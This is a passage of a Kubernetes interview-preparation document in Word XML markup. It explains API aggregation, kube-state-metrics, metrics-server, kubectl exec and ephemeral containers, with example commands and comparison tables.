        <w:t xml:space="preserve">         * Kubernetes API server = central government office</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * API aggregation = linking external departments that provide specialized services (like transport or tax offices) but still appear under the same government portal</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Extends Kubernetes without modifying core</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Modular architecture</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Independent deployment of APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Better separation of concerns</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Supports complex systems like metrics and storage APIs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Additional network hop (latency)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * External API server must be highly available</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * More operational complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Debugging can be harder</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensure TLS security between API server and extension API</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitor external API servers carefully</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use for complex APIs, not simple use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prefer CRDs for simpler extensions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>API Aggregation in Kubernetes is a mechanism that allows the Kubernetes API server to extend its functionality by proxying requests to external API servers registered through APIService objects, enabling custom APIs to appear as native Kubernetes resources while maintaining a modular and extensible architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q323. What is kube-state-metrics?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kube-state-metrics is a Kubernetes add-on service that generates metrics about the state of objects inside Kubernetes by reading the cluster API and exposing them in Prometheus format.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kube-state-metrics converts Kubernetes “object state” into metrics that monitoring systems can consume.</w:t>
        <w:br/>
        <w:t>It does not collect node or container performance metrics—it focuses on Kubernetes object state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it actually does</w:t>
        <w:br/>
        <w:t>It watches the Kubernetes API and exposes information like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * ReplicaSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * StatefulSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * DaemonSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Jobs/CronJobs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kind of metrics it provides</w:t>
        <w:br/>
        <w:t>1. Deployment state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Desired replicas</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Available replicas</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Updated replicas</w:t>
        <w:br/>
        <w:t>2. Pod state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Running / Pending / Failed count</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Restart counts</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pod phase status</w:t>
        <w:br/>
        <w:t>3. Node state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ready / NotReady status</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduling availability</w:t>
        <w:br/>
        <w:t>4. Workload health</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * HPA metrics (current vs desired replicas)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Job success/failure status</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does NOT do</w:t>
        <w:br/>
        <w:t>kube-state-metrics does NOT measure:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Disk I/O</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Network throughput</w:t>
        <w:br/>
        <w:t>Those come from:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * node-exporter</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * cAdvisor</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * metrics-server</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Kubernetes API → kube-state-metrics → Prometheus → Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Reads cluster state from API server</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Converts it into Prometheus metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Exposes /metrics endpoint</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example metrics</w:t>
        <w:br/>
        <w:t>Deployment metric</w:t>
        <w:br/>
        <w:t>kube_deployment_status_replicas_available{deployment="api"} 3</w:t>
        <w:br/>
        <w:t>Pod metric</w:t>
        <w:br/>
        <w:t>kube_pod_status_phase{phase="Running"} 20</w:t>
        <w:br/>
        <w:t>Node metric</w:t>
        <w:br/>
        <w:t>kube_node_status_condition{condition="Ready",status="true"} 5</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kube-state-metrics is important</w:t>
        <w:br/>
        <w:t>It helps answer questions like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * How many replicas are actually running?</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Are any Pods stuck in Pending state?</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Is a Deployment healthy?</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Are nodes ready?</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kube-state-metrics vs metrics-server</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-state-metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>metrics-server</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Focus</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster object state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Data source</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes API</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubelet/cAdvisor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Monitoring + alerting</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Autoscaling (HPA)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU/Memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes cluster = company</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-state-metrics = HR dashboard showing employee status (who is present, assigned, missing)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * metrics-server = performance monitor showing CPU/efficiency of employees</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t>1. Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Track deployment health</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Detect failed Pods</w:t>
        <w:br/>
        <w:t>2. Alerting</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Alert if replicas are not matching desired state</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Alert if nodes are NotReady</w:t>
        <w:br/>
        <w:t>3. Dashboards</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Grafana dashboards for cluster health</w:t>
        <w:br/>
        <w:t>4. SRE observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Identify misbehaving workloads quickly</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Very detailed cluster visibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Works well with Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No impact on application performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Easy to integrate</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No runtime performance metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Can generate large metric volumes in big clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires Prometheus to be useful</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kube-state-metrics is a Kubernetes component that exposes cluster object state information such as deployments, pods, nodes, and replicas in Prometheus-compatible metrics format by querying the Kubernetes API server, enabling monitoring and alerting based on the desired and actual state of cluster resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q324. Explain metrics-server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: metrics-server is a lightweight, cluster-wide component in Kubernetes that collects and exposes real-time resource usage metrics (CPU and memory) from nodes and pods.</w:t>
        <w:br/>
        <w:t>It is mainly used for autoscaling decisions (HPA) and basic cluster monitoring.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>metrics-server provides “how much CPU and memory is being used right now” for Pods and Nodes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why metrics-server is used</w:t>
        <w:br/>
        <w:t>It helps Kubernetes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enable Horizontal Pod Autoscaler (HPA)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Provide live resource usage data</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Support kubectl top commands</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Monitor cluster load at a basic level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What metrics-server collects</w:t>
        <w:br/>
        <w:t>1. Node metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory usage</w:t>
        <w:br/>
        <w:t>2. Pod metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CPU usage per Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Memory usage per Pod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What it does NOT do</w:t>
        <w:br/>
        <w:t>metrics-server does NOT store or provide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Historical data</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Long-term monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Detailed Kubernetes object state</w:t>
        <w:br/>
        <w:t>For that you use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-state-metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prometheus</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. metrics-server queries kubelet on each node</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. kubelet collects metrics from cAdvisor</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. metrics-server aggregates data</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. exposes metrics via Kubernetes API</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Pods/Nodes → kubelet → cAdvisor → metrics-server → Kubernetes API</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example usage</w:t>
        <w:br/>
        <w:t>1. kubectl top commands</w:t>
        <w:br/>
        <w:t>kubectl top node</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>node-1   250m CPU   60% memory</w:t>
        <w:br/>
        <w:t>node-2   180m CPU   45% memory</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl top pod</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>nginx-pod   50m CPU   30Mi memory</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Role in autoscaling (HPA)</w:t>
        <w:br/>
        <w:t>metrics-server provides data for:</w:t>
        <w:br/>
        <w:t>HPA → checks CPU/memory usage → scales Pods up/down</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Target CPU: 50%</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Current CPU: 80%</w:t>
        <w:br/>
        <w:t>→ HPA scales out Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Lightweight (low resource usage)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Real-time metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cluster-wide aggregation</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Required for HPA based on CPU/memory</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>metrics-server vs kube-state-metrics</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>metrics-server</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kube-state-metrics</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Data type</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource usage</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Object state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Source</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet/cAdvisor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes API</w:t>
        <w:br/>
        <w:tab/>
        <w:t>CPU/Memory</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅ Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Historical data</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌ No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Used for</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HPA, kubectl top</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Monitoring/alerts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Kubernetes cluster = office</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * metrics-server = live CCTV showing who is working hard right now (CPU/memory usage)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * kube-state-metrics = HR system showing employee status (present, absent, assigned)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is important</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Enables autoscaling (HPA cannot work without it)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Helps debug performance issues quickly</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Provides real-time visibility into workloads</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * No historical metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * No advanced analytics</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Short retention window (just current state)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Not a full monitoring solution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Always deploy metrics-server in production clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Use Prometheus + Grafana for full observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Combine with kube-state-metrics for complete visibility</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Ensure kubelet RBAC permissions are correctly configured</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>metrics-server is a lightweight Kubernetes component that collects real-time CPU and memory usage metrics from nodes and pods via kubelet and cAdvisor, exposing them through the Kubernetes Metrics API to support autoscaling (HPA) and basic cluster monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q325. What is kubectl exec?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kubectl exec is a command used to run a command inside a running container in a Pod in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kubectl exec lets you “enter” a running container and execute commands inside it.</w:t>
        <w:br/>
        <w:t>It is mainly used for debugging, troubleshooting, and inspection.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kubectl exec is used</w:t>
        <w:br/>
        <w:t>It helps you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Inspect running applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Debug issues inside containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Check logs/files/config inside a Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Run administrative commands in containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic syntax</w:t>
        <w:br/>
        <w:t>kubectl exec &lt;pod-name&gt; -- &lt;command&gt;</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example 1: Run a command inside a Pod</w:t>
        <w:br/>
        <w:t>kubectl exec nginx-pod -- ls /usr/share/nginx/html</w:t>
        <w:br/>
        <w:t>This lists files inside the container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example 2: Open an interactive shell</w:t>
        <w:br/>
        <w:t>kubectl exec -it nginx-pod -- /bin/bash</w:t>
        <w:br/>
        <w:t>or (for Alpine images):</w:t>
        <w:br/>
        <w:t>kubectl exec -it nginx-pod -- /bin/sh</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * -i → interactive</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * -t → pseudo-TTY (terminal)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example 3: Pod with multiple containers</w:t>
        <w:br/>
        <w:t>If a Pod has multiple containers:</w:t>
        <w:br/>
        <w:t>kubectl exec -it my-pod -c app-container -- sh</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * -c specifies container name</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works internally</w:t>
        <w:br/>
        <w:t>kubectl → kube-apiserver → kubelet → container runtime → container process</w:t>
        <w:br/>
        <w:t>Kubernetes sends the command to the kubelet on the node where the Pod is running.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl exec vs kubectl run</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl exec</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl run</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Target</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Existing Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>New Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Debugging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Create workload</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Temporary command</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Full Pod lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubectl exec vs SSH</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl exec</w:t>
        <w:br/>
        <w:tab/>
        <w:t>SSH</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Access level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node-level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes RBAC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>OS credentials</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>App debugging</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Server management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Pod = running machine</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * kubectl exec = remote control to open terminal inside that machine and run commands</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t>1. Debug application issues</w:t>
        <w:br/>
        <w:t>kubectl exec pod -- curl localhost:8080</w:t>
        <w:br/>
        <w:t>2. Check environment variables</w:t>
        <w:br/>
        <w:t>kubectl exec pod -- env</w:t>
        <w:br/>
        <w:t>3. Inspect logs/files</w:t>
        <w:br/>
        <w:t>kubectl exec pod -- cat /app/config.json</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security considerations</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Requires RBAC permissions (pods/exec)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Can be restricted in production clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Should not be used for permanent changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Often disabled in strict security environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Use for debugging only</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Prefer ephemeral debug containers in modern Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Avoid making production changes via exec</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Combine with logs (kubectl logs) for troubleshooting</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kubectl exec is a Kubernetes command that allows users to execute commands inside a running container within a Pod by interacting with the kubelet through the API server, primarily used for debugging, troubleshooting, and inspecting live application environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q326. Explain ephemeral containers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ephemeral Containers in Kubernetes are temporary containers that you can inject into a running Pod for debugging purposes without restarting or modifying the original application containers.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Ephemeral containers are “debug containers” added to a live Pod to inspect or troubleshoot issues safely.</w:t>
        <w:br/>
        <w:t>They are not part of the normal Pod spec lifecycle.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why ephemeral containers are used</w:t>
        <w:br/>
        <w:t>They help you:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Debug production issues without downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Inspect running containers when kubectl exec is not enough</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Troubleshoot minimal/distroless images (no shell inside container)</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Avoid restarting Pods just for debugging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How they are different from normal containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Added after Pod is created</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Do NOT restart Pod</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Do NOT affect Pod spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Exist only temporarily</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Cannot be updated once created</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">            1. Pod is running normally</w:t>
        <w:br/>
        <w:t xml:space="preserve">            2. You inject an ephemeral container into it</w:t>
        <w:br/>
        <w:t xml:space="preserve">            3. Container shares the same network namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">            4. You use it to inspect/debug other containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">            5. It disappears when Pod is deleted</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example command</w:t>
        <w:br/>
        <w:t>kubectl debug -it pod/my-pod --image=busybox --target=my-container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens internally</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * Kubernetes adds ephemeral container spec via API</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * kubelet starts the debug container</w:t>
        <w:br/>
        <w:t xml:space="preserve">            * It joins the existing Pod namespaces (network, process, etc.)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use cases</w:t>
        <w:br/>
        <w:t>1. Debugging missing shell</w:t>
        <w:br/>
        <w:t>If app container is minimal (no bash/sh):</w:t>
        <w:br/>
